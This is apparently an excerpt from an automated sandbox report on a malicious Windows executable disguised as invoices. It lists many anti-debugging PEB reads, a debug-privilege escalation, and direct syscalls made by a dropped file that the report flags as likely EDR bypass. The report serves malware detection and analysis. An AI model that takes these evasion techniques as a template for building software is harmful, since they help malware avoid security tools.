Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01070946 mov eax, dword ptr fs:[00000030h] 2_2_01070946
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01016962 mov eax, dword ptr fs:[00000030h] 2_2_01016962
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01016962 mov eax, dword ptr fs:[00000030h] 2_2_01016962
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01016962 mov eax, dword ptr fs:[00000030h] 2_2_01016962
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0103096E mov eax, dword ptr fs:[00000030h] 2_2_0103096E
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0103096E mov edx, dword ptr fs:[00000030h] 2_2_0103096E
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0103096E mov eax, dword ptr fs:[00000030h] 2_2_0103096E
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01094978 mov eax, dword ptr fs:[00000030h] 2_2_01094978
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01094978 mov eax, dword ptr fs:[00000030h] 2_2_01094978
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF0887 mov eax, dword ptr fs:[00000030h] 2_2_00FF0887
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0107C97C mov eax, dword ptr fs:[00000030h] 2_2_0107C97C
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h] 2_2_010029A0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h] 2_2_010029A0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h] 2_2_010029A0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h] 2_2_010029A0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h] 2_2_010029A0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h] 2_2_010029A0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h] 2_2_010029A0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h] 2_2_010029A0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h] 2_2_010029A0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h] 2_2_010029A0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h] 2_2_010029A0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h] 2_2_010029A0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010029A0 mov eax, dword ptr fs:[00000030h] 2_2_010029A0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF4859 mov eax, dword ptr fs:[00000030h] 2_2_00FF4859
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF4859 mov eax, dword ptr fs:[00000030h] 2_2_00FF4859
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010789B3 mov esi, dword ptr fs:[00000030h] 2_2_010789B3
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010789B3 mov eax, dword ptr fs:[00000030h] 2_2_010789B3
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010789B3 mov eax, dword ptr fs:[00000030h] 2_2_010789B3
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010869C0 mov eax, dword ptr fs:[00000030h] 2_2_010869C0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010249D0 mov eax, dword ptr fs:[00000030h] 2_2_010249D0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010BA9D3 mov eax, dword ptr fs:[00000030h] 2_2_010BA9D3
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0107E9E0 mov eax, dword ptr fs:[00000030h] 2_2_0107E9E0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010229F9 mov eax, dword ptr fs:[00000030h] 2_2_010229F9
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010229F9 mov eax, dword ptr fs:[00000030h] 2_2_010229F9
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0107C810 mov eax, dword ptr fs:[00000030h] 2_2_0107C810
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFA9D0 mov eax, dword ptr fs:[00000030h] 2_2_00FFA9D0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFA9D0 mov eax, dword ptr fs:[00000030h] 2_2_00FFA9D0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFA9D0 mov eax, dword ptr fs:[00000030h] 2_2_00FFA9D0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFA9D0 mov eax, dword ptr fs:[00000030h] 2_2_00FFA9D0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFA9D0 mov eax, dword ptr fs:[00000030h] 2_2_00FFA9D0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFA9D0 mov eax, dword ptr fs:[00000030h] 2_2_00FFA9D0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0102A830 mov eax, dword ptr fs:[00000030h] 2_2_0102A830
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0109483A mov eax, dword ptr fs:[00000030h] 2_2_0109483A
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0109483A mov eax, dword ptr fs:[00000030h] 2_2_0109483A
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01012835 mov eax, dword ptr fs:[00000030h] 2_2_01012835
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01012835 mov eax, dword ptr fs:[00000030h] 2_2_01012835
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01012835 mov eax, dword ptr fs:[00000030h] 2_2_01012835
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01012835 mov ecx, dword ptr fs:[00000030h] 2_2_01012835
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01012835 mov eax, dword ptr fs:[00000030h] 2_2_01012835
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01012835 mov eax, dword ptr fs:[00000030h] 2_2_01012835
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01002840 mov ecx, dword ptr fs:[00000030h] 2_2_01002840
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF09AD mov eax, dword ptr fs:[00000030h] 2_2_00FF09AD
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF09AD mov eax, dword ptr fs:[00000030h] 2_2_00FF09AD
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01020854 mov eax, dword ptr fs:[00000030h] 2_2_01020854
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0107E872 mov eax, dword ptr fs:[00000030h] 2_2_0107E872
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0107E872 mov eax, dword ptr fs:[00000030h] 2_2_0107E872
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01086870 mov eax, dword ptr fs:[00000030h] 2_2_01086870
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01086870 mov eax, dword ptr fs:[00000030h] 2_2_01086870
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0107C89D mov eax, dword ptr fs:[00000030h] 2_2_0107C89D
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0101E8C0 mov eax, dword ptr fs:[00000030h] 2_2_0101E8C0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FE8918 mov eax, dword ptr fs:[00000030h] 2_2_00FE8918
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FE8918 mov eax, dword ptr fs:[00000030h] 2_2_00FE8918
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010BA8E4 mov eax, dword ptr fs:[00000030h] 2_2_010BA8E4
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0102C8F9 mov eax, dword ptr fs:[00000030h] 2_2_0102C8F9
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0102C8F9 mov eax, dword ptr fs:[00000030h] 2_2_0102C8F9
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0106EB1D mov eax, dword ptr fs:[00000030h] 2_2_0106EB1D
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0106EB1D mov eax, dword ptr fs:[00000030h] 2_2_0106EB1D
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0106EB1D mov eax, dword ptr fs:[00000030h] 2_2_0106EB1D
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0106EB1D mov eax, dword ptr fs:[00000030h] 2_2_0106EB1D
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0106EB1D mov eax, dword ptr fs:[00000030h] 2_2_0106EB1D
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0106EB1D mov eax, dword ptr fs:[00000030h] 2_2_0106EB1D
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0106EB1D mov eax, dword ptr fs:[00000030h] 2_2_0106EB1D
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0106EB1D mov eax, dword ptr fs:[00000030h] 2_2_0106EB1D
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0106EB1D mov eax, dword ptr fs:[00000030h] 2_2_0106EB1D
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0101EB20 mov eax, dword ptr fs:[00000030h] 2_2_0101EB20
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0101EB20 mov eax, dword ptr fs:[00000030h] 2_2_0101EB20
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010B8B28 mov eax, dword ptr fs:[00000030h] 2_2_010B8B28
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010B8B28 mov eax, dword ptr fs:[00000030h] 2_2_010B8B28
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF0AD0 mov eax, dword ptr fs:[00000030h] 2_2_00FF0AD0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01086B40 mov eax, dword ptr fs:[00000030h] 2_2_01086B40
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01086B40 mov eax, dword ptr fs:[00000030h] 2_2_01086B40
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010BAB40 mov eax, dword ptr fs:[00000030h] 2_2_010BAB40
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01098B42 mov eax, dword ptr fs:[00000030h] 2_2_01098B42
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF8AA0 mov eax, dword ptr fs:[00000030h] 2_2_00FF8AA0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF8AA0 mov eax, dword ptr fs:[00000030h] 2_2_00FF8AA0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFEA80 mov eax, dword ptr fs:[00000030h] 2_2_00FFEA80
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFEA80 mov eax, dword ptr fs:[00000030h] 2_2_00FFEA80
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFEA80 mov eax, dword ptr fs:[00000030h] 2_2_00FFEA80
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFEA80 mov eax, dword ptr fs:[00000030h] 2_2_00FFEA80
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFEA80 mov eax, dword ptr fs:[00000030h] 2_2_00FFEA80
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFEA80 mov eax, dword ptr fs:[00000030h] 2_2_00FFEA80
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFEA80 mov eax, dword ptr fs:[00000030h] 2_2_00FFEA80
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFEA80 mov eax, dword ptr fs:[00000030h] 2_2_00FFEA80
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFEA80 mov eax, dword ptr fs:[00000030h] 2_2_00FFEA80
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF6A50 mov eax, dword ptr fs:[00000030h] 2_2_00FF6A50
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF6A50 mov eax, dword ptr fs:[00000030h] 2_2_00FF6A50
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF6A50 mov eax, dword ptr fs:[00000030h] 2_2_00FF6A50
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF6A50 mov eax, dword ptr fs:[00000030h] 2_2_00FF6A50
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF6A50 mov eax, dword ptr fs:[00000030h] 2_2_00FF6A50
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF6A50 mov eax, dword ptr fs:[00000030h] 2_2_00FF6A50
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF6A50 mov eax, dword ptr fs:[00000030h] 2_2_00FF6A50
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01000BBE mov eax, dword ptr fs:[00000030h] 2_2_01000BBE
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01000BBE mov eax, dword ptr fs:[00000030h] 2_2_01000BBE
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01010BCB mov eax, dword ptr fs:[00000030h] 2_2_01010BCB
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01010BCB mov eax, dword ptr fs:[00000030h] 2_2_01010BCB
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01010BCB mov eax, dword ptr fs:[00000030h] 2_2_01010BCB
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0109EBD0 mov eax, dword ptr fs:[00000030h] 2_2_0109EBD0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0107CBF0 mov eax, dword ptr fs:[00000030h] 2_2_0107CBF0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0101EBFC mov eax, dword ptr fs:[00000030h] 2_2_0101EBFC
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF8BF0 mov eax, dword ptr fs:[00000030h] 2_2_00FF8BF0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF8BF0 mov eax, dword ptr fs:[00000030h] 2_2_00FF8BF0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF8BF0 mov eax, dword ptr fs:[00000030h] 2_2_00FF8BF0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0107CA11 mov eax, dword ptr fs:[00000030h] 2_2_0107CA11
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0102CA24 mov eax, dword ptr fs:[00000030h] 2_2_0102CA24
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0101EA2E mov eax, dword ptr fs:[00000030h] 2_2_0101EA2E
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF0BCD mov eax, dword ptr fs:[00000030h] 2_2_00FF0BCD
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF0BCD mov eax, dword ptr fs:[00000030h] 2_2_00FF0BCD
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF0BCD mov eax, dword ptr fs:[00000030h] 2_2_00FF0BCD
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01014A35 mov eax, dword ptr fs:[00000030h] 2_2_01014A35
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01014A35 mov eax, dword ptr fs:[00000030h] 2_2_01014A35
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01000A5B mov eax, dword ptr fs:[00000030h] 2_2_01000A5B
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01000A5B mov eax, dword ptr fs:[00000030h] 2_2_01000A5B
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0102CA6F mov eax, dword ptr fs:[00000030h] 2_2_0102CA6F
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0102CA6F mov eax, dword ptr fs:[00000030h] 2_2_0102CA6F
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0102CA6F mov eax, dword ptr fs:[00000030h] 2_2_0102CA6F
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0106CA72 mov eax, dword ptr fs:[00000030h] 2_2_0106CA72
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0106CA72 mov eax, dword ptr fs:[00000030h] 2_2_0106CA72
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FECB7E mov eax, dword ptr fs:[00000030h] 2_2_00FECB7E
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010C4A80 mov eax, dword ptr fs:[00000030h] 2_2_010C4A80
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01028A90 mov edx, dword ptr fs:[00000030h] 2_2_01028A90
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01046AA4 mov eax, dword ptr fs:[00000030h] 2_2_01046AA4
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01046ACC mov eax, dword ptr fs:[00000030h] 2_2_01046ACC
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01046ACC mov eax, dword ptr fs:[00000030h] 2_2_01046ACC
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01046ACC mov eax, dword ptr fs:[00000030h] 2_2_01046ACC
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01024AD0 mov eax, dword ptr fs:[00000030h] 2_2_01024AD0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01024AD0 mov eax, dword ptr fs:[00000030h] 2_2_01024AD0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0102AAEE mov eax, dword ptr fs:[00000030h] 2_2_0102AAEE
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0102AAEE mov eax, dword ptr fs:[00000030h] 2_2_0102AAEE
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0100AD00 mov eax, dword ptr fs:[00000030h] 2_2_0100AD00
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0100AD00 mov eax, dword ptr fs:[00000030h] 2_2_0100AD00
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0100AD00 mov eax, dword ptr fs:[00000030h] 2_2_0100AD00
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010A8D10 mov eax, dword ptr fs:[00000030h] 2_2_010A8D10
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010A8D10 mov eax, dword ptr fs:[00000030h] 2_2_010A8D10
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01024D1D mov eax, dword ptr fs:[00000030h] 2_2_01024D1D
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01078D20 mov eax, dword ptr fs:[00000030h] 2_2_01078D20
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FECCC8 mov eax, dword ptr fs:[00000030h] 2_2_00FECCC8
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01088D6B mov eax, dword ptr fs:[00000030h] 2_2_01088D6B
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FE8C8D mov eax, dword ptr fs:[00000030h] 2_2_00FE8C8D
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010C4DAD mov eax, dword ptr fs:[00000030h] 2_2_010C4DAD
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01026DA0 mov eax, dword ptr fs:[00000030h] 2_2_01026DA0
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010B8DAE mov eax, dword ptr fs:[00000030h] 2_2_010B8DAE
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_010B8DAE mov eax, dword ptr fs:[00000030h] 2_2_010B8DAE
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFAC50 mov eax, dword ptr fs:[00000030h] 2_2_00FFAC50
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFAC50 mov eax, dword ptr fs:[00000030h] 2_2_00FFAC50
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFAC50 mov eax, dword ptr fs:[00000030h] 2_2_00FFAC50
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFAC50 mov eax, dword ptr fs:[00000030h] 2_2_00FFAC50
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFAC50 mov eax, dword ptr fs:[00000030h] 2_2_00FFAC50
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FFAC50 mov eax, dword ptr fs:[00000030h] 2_2_00FFAC50
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF6C50 mov eax, dword ptr fs:[00000030h] 2_2_00FF6C50
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF6C50 mov eax, dword ptr fs:[00000030h] 2_2_00FF6C50
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FF6C50 mov eax, dword ptr fs:[00000030h] 2_2_00FF6C50
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0102CDB1 mov ecx, dword ptr fs:[00000030h] 2_2_0102CDB1
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0102CDB1 mov eax, dword ptr fs:[00000030h] 2_2_0102CDB1
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0102CDB1 mov eax, dword ptr fs:[00000030h] 2_2_0102CDB1
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01018DBF mov eax, dword ptr fs:[00000030h] 2_2_01018DBF
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01018DBF mov eax, dword ptr fs:[00000030h] 2_2_01018DBF
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01074DD7 mov eax, dword ptr fs:[00000030h] 2_2_01074DD7
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01074DD7 mov eax, dword ptr fs:[00000030h] 2_2_01074DD7
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0101EDD3 mov eax, dword ptr fs:[00000030h] 2_2_0101EDD3
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_0101EDD3 mov eax, dword ptr fs:[00000030h] 2_2_0101EDD3
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_00FEEC20 mov eax, dword ptr fs:[00000030h] 2_2_00FEEC20
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Code function: 2_2_01010DE1 mov eax, dword ptr fs:[00000030h] 2_2_01010DE1
Enables debug privileges
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtWriteVirtualMemory: Direct from: 0x76F0490C Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtReadVirtualMemory: Direct from: 0x76F02E8C Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtCreateKey: Direct from: 0x76F02C6C Jump to behavior
Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exe NtSetInformationThread: Direct from: 0x76F02B4C Jump to behavior
